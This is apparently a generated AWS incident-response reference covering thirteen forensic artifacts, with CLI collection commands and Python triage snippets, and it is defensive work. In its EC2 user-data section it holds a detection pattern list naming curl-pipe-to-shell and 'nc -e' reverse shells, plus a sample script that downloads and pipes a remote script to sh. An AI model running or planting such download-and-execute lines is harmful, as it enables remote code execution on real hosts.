# AWS Cloud Forensic Artifacts Reference

**Total Artifacts:** 13 | **Generated:** 2026-03-07

---

## Cloud Infrastructure

### AWS CloudTrail Management Events
**Location:** `AWS CloudTrail > Event history (last 90 days) or trail delivery in S3 / CloudWatch Logs`

AWS control-plane audit records for management events including console activity, API calls, IAM changes, role assumptions, service configuration updates, and destructive actions. Event history provides recent management events, while a trail is required for retained delivery to S3 or CloudWatch Logs.

**Forensic Value:** CloudTrail is the primary source for reconstructing attacker activity across AWS accounts. It identifies the calling principal, source IP, user agent, request parameters, and affected resources for changes to IAM, EC2, EKS, ECR, S3, and logging configuration itself. It also reveals anti-forensics such as trail deletion, region disabling, or tampering with guardrail services.

**Tools:** AWS Console, AWS CLI, Athena, CloudWatch Logs Insights, SIEM

**Technologies:** AWS, CloudTrail

**Collection Commands:**
- **AWS CLI:** `aws cloudtrail lookup-events --start-time 2026-03-01T00:00:00Z --end-time 2026-03-07T23:59:59Z --output json > cloudtrail_event_history.json`
- **AWS CLI:** `aws s3 cp s3://<trail-bucket>/AWSLogs/<account-id>/CloudTrail/<region>/ ./cloudtrail/ --recursive`
- **CloudWatch Logs Insights:** `fields @timestamp, eventSource, eventName, userIdentity.type, sourceIPAddress, userAgent | sort @timestamp desc | limit 200`

**Official References:**
- [View CloudTrail events and event history](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/view-cloudtrail-events.html)

**Collection Constraints:**
- Event history alone is short-lived and management-event focused; durable investigations require a retained trail or exported sink data.
- Data events and organization-wide visibility depend on pre-incident CloudTrail configuration across the accounts and regions in scope.
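Once trail files are pulled down with the S3 command above, tampering events can be triaged offline. A minimal sketch, assuming Records-style entries as delivered to S3; the event-name set and the sample record are illustrative, not exhaustive:

```python
# Event names commonly associated with CloudTrail tampering (anti-forensics);
# extend the set to match the investigation's scope.
ANTI_FORENSICS = {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors"}

def find_antiforensics(records):
    """Return sorted (eventTime, eventName, principal ARN, source IP) tuples
    for tampering-related events in Records-style CloudTrail entries."""
    return sorted(
        (r.get("eventTime"), r.get("eventName"),
         r.get("userIdentity", {}).get("arn"), r.get("sourceIPAddress"))
        for r in records if r.get("eventName") in ANTI_FORENSICS
    )

# Inline sample shaped like entries from a trail file's "Records" list.
sample = [
    {"eventTime": "2026-03-05T10:12:00Z", "eventName": "StopLogging",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/alice"},
     "sourceIPAddress": "198.51.100.7"},
    {"eventTime": "2026-03-05T10:13:00Z", "eventName": "DescribeInstances",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/alice"},
     "sourceIPAddress": "198.51.100.7"},
]
hits = find_antiforensics(sample)
```

Any hit here is a candidate pivot point for the rest of the timeline: tampering events usually bracket the window the attacker cared about.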

### AWS GuardDuty Findings
**Location:** `Amazon GuardDuty detector findings and delegated administrator exports`

Managed threat-detection findings generated from AWS foundational data sources such as CloudTrail management events, VPC Flow Logs, Route 53 Resolver query logs, EKS audit telemetry, and related protection plans.

**Forensic Value:** GuardDuty findings accelerate scoping by surfacing suspicious identities, anomalous API behavior, credential misuse, crypto-mining, exfiltration patterns, and EKS threats that might otherwise require manual multi-source correlation. Findings also preserve service-side context like detector IDs, resource types, severity, and evidence linkage for triage and reporting.

**Tools:** AWS Console, AWS CLI, SIEM

**Technologies:** AWS, GuardDuty

**Collection Commands:**
- **AWS CLI:** `aws guardduty list-detectors --output json > guardduty_detectors.json`
- **AWS CLI:** `aws guardduty list-findings --detector-id <detector-id> --output json > guardduty_finding_ids.json`
- **AWS CLI:** `aws guardduty get-findings --detector-id <detector-id> --finding-ids <finding-id-1> <finding-id-2> > guardduty_findings.json`

**Official References:**
- [GuardDuty foundational data sources](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_data-sources.html)
- [GuardDuty EKS Protection](https://docs.aws.amazon.com/guardduty/latest/ug/kubernetes-protection.html)

**Collection Constraints:**
- GuardDuty findings are summarized detections, not raw telemetry, and must be validated with the underlying logs.
- Coverage depends on which GuardDuty protections and foundational data sources were enabled before the incident.
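Exported findings can be ranked before pulling the underlying logs. A small sketch against the PascalCase fields that `aws guardduty get-findings` returns; the sample findings are illustrative:

```python
def triage(findings, min_severity=7.0):
    """Keep findings at or above min_severity, sorted by severity descending.
    Field names follow the `aws guardduty get-findings` CLI response."""
    keep = [f for f in findings if f.get("Severity", 0) >= min_severity]
    return sorted(keep, key=lambda f: f["Severity"], reverse=True)

# Inline sample shaped like the Findings list from get-findings output.
sample = [
    {"Type": "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS",
     "Severity": 8.0, "Region": "us-east-1"},
    {"Type": "Recon:EC2/PortProbeUnprotectedPort",
     "Severity": 2.0, "Region": "us-east-1"},
]
high = triage(sample)
```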

### Amazon EC2 / EBS / AMI / User Data Metadata
**Location:** `EC2 instance, volume, image, metadata-options, and user-data configuration via EC2 APIs and IMDS`

Instance and storage configuration metadata including instance profile, security groups, attached volumes, AMI lineage, user-data scripts, IMDS configuration, launch templates, and snapshot relationships.

**Forensic Value:** EC2 metadata explains how a workload was launched, what credentials it inherited, what bootstrap scripts ran, and which EBS volumes preserve evidence. It also reveals dangerous user-data scripts, IMDS exposure, cross-account AMI usage, and launch-template tampering that can establish persistence or explain how attacker tooling was deployed at scale.

**Tools:** AWS Console, AWS CLI, EC2 IMDSv2 utilities

**Technologies:** AWS, Amazon EC2

**Collection Commands:**
- **AWS CLI:** `aws ec2 describe-instances --instance-ids i-xxxxxxxxxxxxxxxxx > ec2_instance_metadata.json`
- **AWS CLI:** `aws ec2 describe-volumes --filters Name=attachment.instance-id,Values=i-xxxxxxxxxxxxxxxxx > ec2_attached_volumes.json`
- **AWS CLI:** `aws ec2 describe-instance-attribute --instance-id i-xxxxxxxxxxxxxxxxx --attribute userData > ec2_user_data.json`
- **IMDSv2:** `TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"); curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document > ec2_instance_identity_document.json`

**Official References:**
- [Access instance metadata for an EC2 instance](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html)
- [Amazon EBS snapshots](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-snapshots.html)

**Collection Constraints:**
- Metadata is highly time-sensitive because launch templates, user data, and attached resources can be modified quickly during response.
- This evidence explains configuration and credential exposure but does not replace disk, memory, or workload-level acquisition.
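The `userData` attribute comes back base64-encoded, so a quick decode-and-scan pass helps surface hostile bootstrap scripts. A sketch with a deliberately small, illustrative pattern list; real triage should use a fuller ruleset:

```python
import base64
import re

# Bootstrap patterns worth a closer look; purely illustrative starting set.
SUSPICIOUS = [r"curl[^\n]*\|\s*(ba)?sh", r"base64\s+(-d|--decode)", r"nc\s+-e"]

def scan_user_data(attr):
    """Decode the base64 UserData value from describe-instance-attribute
    output and return (decoded script, list of patterns that matched)."""
    raw = base64.b64decode(attr.get("UserData", {}).get("Value", ""))
    script = raw.decode(errors="replace")
    return script, [p for p in SUSPICIOUS if re.search(p, script)]

# Inline sample shaped like ec2_user_data.json from the command above.
sample = {"UserData": {"Value": base64.b64encode(
    b"#!/bin/bash\ncurl http://203.0.113.9/x.sh | sh\n").decode()}}
script, matches = scan_user_data(sample)
```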

### Amazon EKS Control Plane Logs
**Location:** `CloudWatch Logs group /aws/eks/<cluster>/cluster for api, controllerManager, and scheduler log types`

Amazon EKS control-plane logs forwarded to CloudWatch Logs when enabled. Includes API server, controller manager, and scheduler logs that show cluster administration, controller activity, scheduling decisions, and service interactions.

**Forensic Value:** EKS control-plane logs reveal cluster-level abuse that host forensics alone cannot show. They identify cluster configuration changes, suspicious API usage, service-account behavior, workload scheduling on unexpected nodes, and attempts to disable or modify logging. They are also critical for understanding whether malicious workloads were introduced through cluster administration instead of direct node compromise.

**Tools:** AWS Console, AWS CLI, CloudWatch Logs Insights, kubectl

**Technologies:** AWS, Amazon EKS, Kubernetes

**Collection Commands:**
- **AWS CLI:** `aws eks describe-cluster --name <cluster-name> --query "cluster.logging" > eks_logging_config.json`
- **AWS CLI:** `aws logs filter-log-events --log-group-name "/aws/eks/<cluster-name>/cluster" --start-time 1709251200000 --end-time 1709856000000 > eks_control_plane_logs.json`
- **CloudWatch Logs Insights:** `fields @timestamp, @logStream, @message | filter @logStream like /kube-apiserver|kube-controller-manager|kube-scheduler/ | sort @timestamp desc | limit 200`

**Official References:**
- [Amazon EKS control plane logs](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html)

**Collection Constraints:**
- Historical control-plane visibility exists only if the relevant EKS log types were enabled before the incident.
- Large clusters can generate substantial CloudWatch data volumes, so investigators need the exact cluster and region scope early.
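Because all control-plane components share one log group, a per-stream event count is a cheap first scoping step on exported `filter-log-events` output. A sketch assuming stream names carry the component as a prefix (e.g. `kube-scheduler-<id>`):

```python
from collections import Counter

def events_per_stream(events):
    """Count exported log events per control-plane component, keyed by the
    log stream's component prefix (the part before the trailing stream id)."""
    counts = Counter()
    for e in events:
        name = e.get("logStreamName", "")
        prefix = name.rsplit("-", 1)[0] if "-" in name else name
        counts[prefix] += 1
    return counts

# Inline sample shaped like the events list from filter-log-events output.
sample = [
    {"logStreamName": "kube-scheduler-abc123", "message": "..."},
    {"logStreamName": "kube-scheduler-abc123", "message": "..."},
    {"logStreamName": "kube-apiserver-def456", "message": "..."},
]
counts = events_per_stream(sample)
```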

### Amazon EKS Kubernetes Audit Logs
**Location:** `CloudWatch Logs group /aws/eks/<cluster>/cluster log type: audit`

Kubernetes audit records emitted by the EKS-managed API server when audit logging is enabled. Captures authenticated requests for pods, secrets, service accounts, configmaps, RBAC objects, exec sessions, and other cluster resources.

**Forensic Value:** Audit logs are the highest-fidelity source for reconstructing attacker actions in the cluster control plane. They reveal secret reads, pod exec abuse, role-binding changes, privilege escalation through service accounts, and direct access to sensitive resources that may never appear in node logs or application telemetry.

**Tools:** AWS Console, AWS CLI, CloudWatch Logs Insights, kubectl

**Technologies:** AWS, Amazon EKS, Kubernetes

**Collection Commands:**
- **AWS CLI:** `aws logs filter-log-events --log-group-name "/aws/eks/<cluster-name>/cluster" --log-stream-name-prefix "kube-apiserver-audit" --start-time 1709251200000 --end-time 1709856000000 > eks_audit_logs.json`
- **CloudWatch Logs Insights:** `fields @timestamp, @message | filter @logStream like /audit/ | sort @timestamp desc | limit 200`
- **kubectl:** `kubectl get events --all-namespaces --sort-by=.metadata.creationTimestamp > eks_k8s_events.txt`

**Official References:**
- [Amazon EKS control plane logs](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html)
- [Kubernetes auditing](https://kubernetes.io/docs/tasks/debug/debug-cluster/audit/)

**Collection Constraints:**
- Audit visibility depends on EKS logging being enabled and retained for the cluster before the incident.
- Audit events must be correlated with node and workload evidence to prove what happened after the API action completed.
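Each exported CloudWatch event's `message` field is itself a JSON Kubernetes audit event, so secret reads and exec sessions can be flagged directly. A sketch using the standard audit-event schema (`verb`, `objectRef`, `user`); the sample event is illustrative:

```python
import json

def flag_sensitive(events):
    """Pick out secret reads and pod exec from Kubernetes audit events
    embedded as JSON strings in filter-log-events messages."""
    flagged = []
    for e in events:
        try:
            audit = json.loads(e["message"])
        except (KeyError, ValueError):
            continue  # skip non-JSON or malformed messages
        ref = audit.get("objectRef", {})
        if (ref.get("resource") == "secrets" and audit.get("verb") in {"get", "list"}) \
                or ref.get("subresource") == "exec":
            flagged.append((audit.get("stageTimestamp"), audit.get("verb"),
                            ref.get("resource"),
                            audit.get("user", {}).get("username")))
    return flagged

# Inline sample shaped like one exported audit event.
sample = [{"message": json.dumps({
    "stageTimestamp": "2026-03-05T11:00:00Z", "verb": "get",
    "objectRef": {"resource": "secrets", "name": "db-creds"},
    "user": {"username": "system:serviceaccount:default:builder"}})}]
flagged = flag_sensitive(sample)
```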

### Amazon ECR CloudTrail and Registry Events
**Location:** `CloudTrail events for ecr.amazonaws.com plus repository and image metadata from ECR APIs`

Registry activity for Amazon Elastic Container Registry including repository creation, policy changes, image push and pull activity, authentication-related events, and image inventory metadata.

**Forensic Value:** ECR events explain how attacker-controlled images entered the environment or how private repositories were enumerated and accessed. They are particularly valuable in supply-chain and container-cluster incidents because they tie image usage back to specific identities, source IPs, and repository mutations that can later be correlated with cluster deployment activity.

**Tools:** AWS Console, AWS CLI, CloudTrail, SIEM

**Technologies:** AWS, Amazon ECR

**Collection Commands:**
- **AWS CLI:** `aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventSource,AttributeValue=ecr.amazonaws.com --output json > ecr_cloudtrail_events.json`
- **AWS CLI:** `aws ecr describe-repositories --output json > ecr_repositories.json`
- **AWS CLI:** `aws ecr describe-images --repository-name <repository-name> --output json > ecr_repository_images.json`

**Official References:**
- [Logging Amazon ECR API calls using CloudTrail](https://docs.aws.amazon.com/AmazonECR/latest/userguide/logging-using-cloudtrail.html)

**Collection Constraints:**
- ECR audit evidence explains registry activity, but investigators still need cluster or host evidence to prove image execution on workloads.
- Historical visibility depends on CloudTrail retention and whether registry metadata was preserved before cleanup or deletion.

## Identity & Directory

### AWS IAM Credential Report & Access Key Metadata
**Location:** `AWS IAM > Credential report plus IAM API responses for users and access keys`

IAM credential reporting data covering password status, MFA state, access key age, credential rotation status, and last-used timestamps. Supplemented by access-key metadata and last-used lookups for each IAM user.

**Forensic Value:** IAM credential data exposes long-lived access paths that attackers prefer because they survive instance rebuilds and password resets. The report highlights dormant privileged users, keys that never rotate, accounts without MFA, and access keys that became active during the compromise window. It is critical for confirming which identities require emergency rotation and which old credentials may have supported persistence.

**Tools:** AWS Console, AWS CLI, Spreadsheet / SIEM

**Technologies:** AWS, AWS IAM

**Collection Commands:**
- **AWS CLI:** `aws iam generate-credential-report && aws iam get-credential-report --output text --query Content | base64 --decode > iam_credential_report.csv`
- **AWS CLI:** `for user in $(aws iam list-users --query "Users[].UserName" --output text); do aws iam list-access-keys --user-name "$user" > "iam_access_keys_${user}.json"; done`
- **AWS CLI:** `aws iam get-access-key-last-used --access-key-id <access-key-id> > iam_access_key_last_used.json`

**Official References:**
- [IAM credential report](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_getting-report.html)

**Collection Constraints:**
- The credential report is a point-in-time administrative snapshot and must be paired with CloudTrail for actual use history and sequencing.
- It only covers IAM users and keys, not every temporary or federated credential path used in the environment.
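The decoded report is plain CSV, so the rotation and MFA checks described above reduce to a few column tests. A sketch using the credential report's documented column names; the threshold and sample row are illustrative:

```python
import csv
import io
from datetime import datetime, timedelta, timezone

def stale_credentials(report_csv, now, max_age_days=90):
    """Flag users with a console password but no MFA, and active access keys
    that have not rotated within max_age_days. Column names follow the IAM
    credential report CSV header."""
    flagged = []
    for row in csv.DictReader(io.StringIO(report_csv)):
        if row.get("password_enabled") == "true" and row.get("mfa_active") == "false":
            flagged.append((row["user"], "no-mfa"))
        rotated = row.get("access_key_1_last_rotated", "N/A")
        if row.get("access_key_1_active") == "true" and rotated not in ("N/A", "not_supported"):
            age = now - datetime.fromisoformat(rotated.replace("Z", "+00:00"))
            if age > timedelta(days=max_age_days):
                flagged.append((row["user"], "stale-key-1"))
    return flagged

# Inline sample with a subset of the report's columns.
sample = ("user,password_enabled,mfa_active,access_key_1_active,access_key_1_last_rotated\n"
          "alice,true,false,true,2024-01-01T00:00:00+00:00\n")
flagged = stale_credentials(sample, datetime(2026, 3, 7, tzinfo=timezone.utc))
```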

## Authentication & Access

### AWS STS AssumeRole and Temporary Credential Events
**Location:** `CloudTrail management events for sts.amazonaws.com and AssumeRole / federation API calls`

CloudTrail records for AWS Security Token Service activity such as AssumeRole, AssumeRoleWithSAML, AssumeRoleWithWebIdentity, and GetFederationToken. These events show temporary-credential issuance across accounts, identities, and workloads.

**Forensic Value:** STS events explain how an attacker moved between AWS identities without long-lived keys. They reveal the source principal, the target role, cross-account pivots, web identity federation abuse, and short-lived sessions created from compromised workloads. Correlating STS issuance with subsequent API activity reconstructs the real privilege path used during the intrusion.

**Tools:** AWS Console, AWS CLI, Athena, SIEM

**Technologies:** AWS, AWS STS, CloudTrail

**Collection Commands:**
- **AWS CLI:** `aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole --start-time 2026-03-01T00:00:00Z --end-time 2026-03-07T23:59:59Z --output json > sts_assumerole_events.json`
- **AWS CLI:** `aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventSource,AttributeValue=sts.amazonaws.com --output json > sts_service_events.json`
- **Athena:** `SELECT eventtime, useridentity.arn, eventname, requestparameters, sourceipaddress FROM cloudtrail_logs WHERE eventsource = 'sts.amazonaws.com' AND eventtime BETWEEN TIMESTAMP '2026-03-01 00:00:00' AND TIMESTAMP '2026-03-07 23:59:59';`

**Official References:**
- [AWS STS AssumeRole API](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html)
- [View CloudTrail events and event history](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/view-cloudtrail-events.html)

**Collection Constraints:**
- STS activity is visible through CloudTrail, so gaps in trail retention or disabled regions directly reduce visibility.
- Short-lived sessions require correlation with subsequent API activity to determine what the assumed role actually did.
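The privilege path described above is easiest to see as a graph of source principal to assumed role. A sketch building those edges from `lookup-events` output (remembering the nested `CloudTrailEvent` JSON string); the sample event is illustrative:

```python
import json
from collections import defaultdict

def role_graph(lookup_output):
    """Build source-principal -> assumed-role-ARN edges from AssumeRole
    events in `aws cloudtrail lookup-events` output."""
    edges = defaultdict(set)
    for ev in lookup_output.get("Events", []):
        detail = json.loads(ev["CloudTrailEvent"])  # nested JSON string
        if detail.get("eventName") != "AssumeRole":
            continue
        src = detail.get("userIdentity", {}).get("arn", "unknown")
        dst = detail.get("requestParameters", {}).get("roleArn")
        if dst:
            edges[src].add(dst)
    return edges

# Inline sample shaped like sts_assumerole_events.json from the command above.
sample = {"Events": [{"CloudTrailEvent": json.dumps({
    "eventName": "AssumeRole",
    "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev"},
    "requestParameters": {"roleArn": "arn:aws:iam::444455556666:role/admin"}})}]}
edges = role_graph(sample)
```

Walking the edges from a known-compromised principal quickly shows every role (and account) it could have reached.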

### Amazon EKS Authenticator Logs
**Location:** `CloudWatch Logs group /aws/eks/<cluster>/cluster log type: authenticator`

Authenticator logs produced by Amazon EKS when enabled, showing how IAM principals were mapped into Kubernetes users and groups during cluster authentication decisions.

**Forensic Value:** Authenticator logs bridge the gap between AWS identities and Kubernetes RBAC by showing which IAM role, user, or federated identity actually authenticated to the cluster. They are critical for tracing abused workforce identities, workload roles, or external identities that successfully entered the cluster before performing administrative actions.

**Tools:** AWS Console, AWS CLI, CloudWatch Logs Insights

**Technologies:** AWS, Amazon EKS, Kubernetes

**Collection Commands:**
- **AWS CLI:** `aws logs filter-log-events --log-group-name "/aws/eks/<cluster-name>/cluster" --log-stream-name-prefix "authenticator" --start-time 1709251200000 --end-time 1709856000000 > eks_authenticator_logs.json`
- **CloudWatch Logs Insights:** `fields @timestamp, @message | filter @logStream like /authenticator/ | sort @timestamp desc | limit 200`

**Official References:**
- [Amazon EKS control plane logs](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html)

**Collection Constraints:**
- Authenticator logs exist only when that log type was enabled for the cluster and retained in CloudWatch.
- They map IAM identities into Kubernetes access decisions but do not show the full downstream workload behavior by themselves.
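Authenticator log lines are key=value formatted, so the IAM-to-Kubernetes mapping can be lifted with a simple pattern. A sketch under the assumption that lines carry `arn="..."` and `username="..."` fields; exact fields vary by authenticator version, so treat the regex as a starting point:

```python
import re

# key="value" pairs; field names vary across authenticator versions.
PAIR = re.compile(r'(\w+)="([^"]*)"')

def iam_to_k8s(lines):
    """Extract (IAM ARN, Kubernetes username) pairs from authenticator
    log lines that carry both arn= and username= fields."""
    pairs = []
    for line in lines:
        kv = dict(PAIR.findall(line))
        if "arn" in kv and "username" in kv:
            pairs.append((kv["arn"], kv["username"]))
    return pairs

# Inline sample modeled on an access-granted authenticator line.
sample = ['time="2026-03-05T12:00:00Z" msg="access granted" '
          'arn="arn:aws:iam::111122223333:role/dev" username="dev-user"']
pairs = iam_to_k8s(sample)
```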

## Network Traffic

### AWS VPC Flow Logs
**Location:** `VPC Flow Logs delivered to CloudWatch Logs, S3, or Kinesis Data Firehose`

Network-flow records for Elastic Network Interfaces (ENIs) covering accepted and rejected traffic with source and destination addresses, ports, protocol, packets, bytes, action, and log status.

**Forensic Value:** VPC Flow Logs are the core AWS network evidence source for confirming connections between instances, containers, NAT gateways, and external infrastructure. They support exfiltration scoping, lateral-movement analysis, and identification of unmanaged assets that contacted attacker infrastructure. Even when packet capture is unavailable, flow logs establish who talked to whom, when, and at what volume.

**Tools:** AWS Console, AWS CLI, Athena, CloudWatch Logs Insights, SIEM

**Technologies:** AWS, VPC Flow Logs

**Collection Commands:**
- **AWS CLI:** `aws ec2 describe-flow-logs --output json > vpc_flow_log_configs.json`
- **AWS CLI:** `aws logs filter-log-events --log-group-name <vpc-flow-log-group> --start-time 1709251200000 --end-time 1709856000000 > vpc_flow_events.json`
- **AWS CLI:** `aws s3 cp s3://<log-bucket>/AWSLogs/<account-id>/vpcflowlogs/ ./vpc-flow-logs/ --recursive`

**Official References:**
- [VPC Flow Logs](https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html)

**Collection Constraints:**
- VPC Flow Logs provide network metadata only and never include packet payloads or decrypted application content.
- Coverage depends on flow logging being enabled for the relevant VPCs, subnets, or ENIs before the incident window.
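Downloaded flow log records in the default format are space-separated fields, which makes top-talker aggregation straightforward. A sketch over the 14-field default record format; the sample lines are illustrative:

```python
from collections import Counter

# Default flow log record format, in field order.
FIELDS = ("version account_id interface_id srcaddr dstaddr srcport dstport "
          "protocol packets bytes start end action log_status").split()

def top_talkers(lines, n=5):
    """Aggregate ACCEPTed bytes per (srcaddr, dstaddr) pair from
    default-format flow log lines and return the n largest."""
    totals = Counter()
    for line in lines:
        rec = dict(zip(FIELDS, line.split()))
        if rec.get("action") == "ACCEPT":
            totals[(rec["srcaddr"], rec["dstaddr"])] += int(rec["bytes"])
    return totals.most_common(n)

# Inline sample default-format records.
sample = [
    "2 111122223333 eni-0a1b2c3d 10.0.1.5 203.0.113.9 49152 443 6 10 84000 1709251200 1709251260 ACCEPT OK",
    "2 111122223333 eni-0a1b2c3d 10.0.1.5 203.0.113.9 49153 443 6 2 1200 1709251300 1709251360 ACCEPT OK",
    "2 111122223333 eni-0a1b2c3d 10.0.1.7 10.0.2.9 22 49200 6 1 60 1709251200 1709251260 REJECT OK",
]
talkers = top_talkers(sample)
```

Custom flow log formats reorder or drop fields, so confirm the format against `describe-flow-logs` output before parsing positionally.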

## DNS Analysis

### Amazon Route 53 Resolver Query Logs
**Location:** `Route 53 Resolver query logging to CloudWatch Logs, S3, or Firehose`

Resolver query logs for DNS requests originating from AWS VPC resources or connected on-premises systems using Route 53 Resolver endpoints. Captures query names, types, response codes, VPC identifiers, and source-instance context.

**Forensic Value:** Resolver logs are high-value for exfiltration and C2 investigations because they capture DNS activity from workloads that may never touch an enterprise DNS server. They reveal domain-generation activity, long-subdomain tunneling patterns, beaconing to attacker infrastructure, and cloud workloads resolving external services immediately before suspicious data transfer.

**Tools:** AWS Console, AWS CLI, Athena, CloudWatch Logs Insights, SIEM

**Technologies:** AWS, Route 53 DNS

**Collection Commands:**
- **AWS CLI:** `aws route53resolver list-resolver-query-log-configs --output json > route53_query_log_configs.json`
- **AWS CLI:** `aws logs filter-log-events --log-group-name <route53-log-group> --start-time 1709251200000 --end-time 1709856000000 > route53_resolver_queries.json`
- **AWS CLI:** `aws s3 cp s3://<log-bucket>/AWSLogs/<account-id>/route53resolver/ ./route53-resolver/ --recursive`

**Official References:**
- [Resolver query logging](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resolver-query-logs.html)

**Collection Constraints:**
- Resolver query evidence exists only when Route 53 query logging was configured for the VPCs involved.
- DNS logs show resolution activity, not the full network session or application-layer transaction that followed.
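The long-subdomain tunneling pattern mentioned above lends itself to a coarse length heuristic over exported records. A sketch assuming records carry a `query_name` field as in Resolver query log JSON; the thresholds and sample names are illustrative and will need tuning against the environment's baseline:

```python
def tunneling_suspects(queries, max_label=40, max_name=120):
    """Flag query names with unusually long labels or overall length,
    a coarse DNS-tunneling heuristic over Resolver query log records."""
    suspects = []
    for q in queries:
        name = q.get("query_name", "").rstrip(".")
        labels = name.split(".")
        if len(name) > max_name or any(len(label) > max_label for label in labels):
            suspects.append(name)
    return suspects

# Inline sample: one benign name, one with an oversized encoded label.
sample = [
    {"query_name": "www.example.com."},
    {"query_name": ("aGV4ZW5jb2RlZGRhdGFleGZpbHRyYXRpb25jaHVuazAwMDE" * 2)
                   + ".tunnel.example.net."},
]
suspects = tunneling_suspects(sample)
```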

## Execution Evidence

### AWS Systems Manager Session Manager Logs
**Location:** `Systems Manager session history with optional CloudWatch Logs or S3 transcript storage`

Session Manager metadata and optional session transcripts for shell access brokered through AWS Systems Manager instead of SSH or RDP. Includes session start and end times, target instance, actor identity, and transcript destinations when logging is enabled.

**Forensic Value:** Session Manager can become the only authoritative record of interactive access to instances when administrators disable direct SSH or RDP. Session history and transcripts reveal who opened privileged sessions, which hosts they touched, whether session logging was disabled, and what commands were executed when transcript logging was enabled.

**Tools:** AWS Console, AWS CLI, CloudWatch Logs, S3

**Technologies:** AWS, Systems Manager

**Collection Commands:**
- **AWS CLI:** `aws ssm describe-sessions --state History --output json > ssm_session_history.json`
- **AWS CLI:** `aws logs filter-log-events --log-group-name <session-manager-log-group> --start-time 1709251200000 --end-time 1709856000000 > ssm_session_logs.json`
- **AWS CLI:** `aws s3 cp s3://<session-manager-bucket>/ ./session-manager-logs/ --recursive`

**Official References:**
- [Logging Session Manager sessions](https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager-logging.html)

**Collection Constraints:**
- Session transcripts are available only if Session Manager logging was enabled to CloudWatch Logs or S3 before the session occurred.
- Session metadata alone may show access timing without preserving every command executed.
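Even without transcripts, session metadata supports an access timeline. A sketch computing durations from `describe-sessions` history, assuming the CLI's PascalCase fields with ISO-style timestamps; the sample session is illustrative:

```python
from datetime import datetime

def session_durations(history):
    """Return (owner, target, minutes) for finished sessions in
    `aws ssm describe-sessions --state History` output, longest first."""
    def parse(ts):
        return datetime.fromisoformat(ts.replace("Z", "+00:00"))

    rows = []
    for s in history.get("Sessions", []):
        start, end = s.get("StartDate"), s.get("EndDate")
        if not (start and end):
            continue  # still-open or incomplete records
        minutes = (parse(end) - parse(start)).total_seconds() / 60
        rows.append((s.get("Owner"), s.get("Target"), round(minutes, 1)))
    return sorted(rows, key=lambda r: r[2], reverse=True)

# Inline sample shaped like one ssm_session_history.json entry.
sample = {"Sessions": [{
    "SessionId": "alice-0a1b2c3d", "Target": "i-0123456789abcdef0",
    "Owner": "arn:aws:iam::111122223333:user/alice",
    "StartDate": "2026-03-05T10:00:00Z", "EndDate": "2026-03-05T10:45:00Z"}]}
rows = session_durations(sample)
```

Unusually long or oddly timed sessions against sensitive hosts are natural candidates for transcript review.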

### Amazon EKS Container Insights Telemetry
**Location:** `CloudWatch Container Insights log groups /aws/containerinsights/<cluster>/performance and application logs`

Container Insights telemetry for EKS clusters, including pod inventory, node metrics, container stdout/stderr collection, and cluster performance data routed through CloudWatch.

**Forensic Value:** Container Insights complements audit and authenticator logs by showing what workloads actually ran after they were scheduled. It exposes suspicious images, noisy or short-lived pods, restart storms caused by attacker activity, and runtime log output that can contain exploitation traces, tooling errors, or exfiltration indicators.

**Tools:** AWS Console, AWS CLI, CloudWatch Logs Insights, kubectl

**Technologies:** AWS, Amazon EKS, Kubernetes

**Collection Commands:**
- **AWS CLI:** `aws logs describe-log-groups --log-group-name-prefix "/aws/containerinsights/<cluster-name>" > eks_container_insights_log_groups.json`
- **AWS CLI:** `aws logs filter-log-events --log-group-name "/aws/containerinsights/<cluster-name>/performance" --start-time 1709251200000 --end-time 1709856000000 > eks_container_insights_performance.json`
- **kubectl:** `kubectl get pods --all-namespaces -o wide > eks_pod_inventory.txt`

**Official References:**
- [Deploy Container Insights on Amazon EKS](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/deploy-container-insights-EKS.html)

**Collection Constraints:**
- Container Insights is available only if it was deployed and retained before the incident window.
- Runtime telemetry can be high-volume and short-lived, especially for ephemeral or auto-scaled workloads.
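Restart storms are easiest to spot from a structured pod export. A sketch assuming `kubectl get pods --all-namespaces -o json` output (JSON export rather than the text inventory captured above); the threshold and sample pod are illustrative:

```python
def restart_hotspots(pods_json, threshold=5):
    """Flag pods whose containers restarted more than threshold times,
    from `kubectl get pods --all-namespaces -o json` output."""
    hot = []
    for pod in pods_json.get("items", []):
        restarts = sum(cs.get("restartCount", 0)
                       for cs in pod.get("status", {}).get("containerStatuses", []))
        if restarts > threshold:
            hot.append((pod["metadata"]["namespace"],
                        pod["metadata"]["name"], restarts))
    return sorted(hot, key=lambda r: r[2], reverse=True)

# Inline sample shaped like one item from the pod list.
sample = {"items": [{
    "metadata": {"namespace": "default", "name": "miner-x9"},
    "status": {"containerStatuses": [{"restartCount": 12}]}}]}
hot = restart_hotspots(sample)
```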

---
*Generated by DFIR Assist*